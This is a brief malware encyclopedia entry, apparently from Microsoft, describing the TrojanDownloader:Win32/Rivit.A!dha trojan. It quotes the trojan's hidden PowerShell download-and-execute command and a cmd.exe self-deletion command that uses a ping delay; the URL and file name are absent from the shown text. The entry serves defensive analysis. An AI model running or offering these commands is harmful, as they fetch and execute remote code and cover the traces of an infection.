Home / malware TrojanDownloader:Win32/Rivit.A!dha
First posted on 15 April 2017.
Source: MicrosoftAliases :
There are no other names known for TrojanDownloader:Win32/Rivit.A!dha.
Explanation :
This trojan opens a PowerShell process to download and run a file from a remote host:
- powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring(
);
The trojan then uses a command prompt process to run a command that deletes the malware file. As part of the command, it pings an IP within the private network range (192.168.0.1 to 192.168.255.254) to cause a short delay to ensure the malware runs before it deletes itself.
We have seen it use the following command and IP address:
- cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del
Analysis by Mathieu LetourneauLast update 15 April 2017
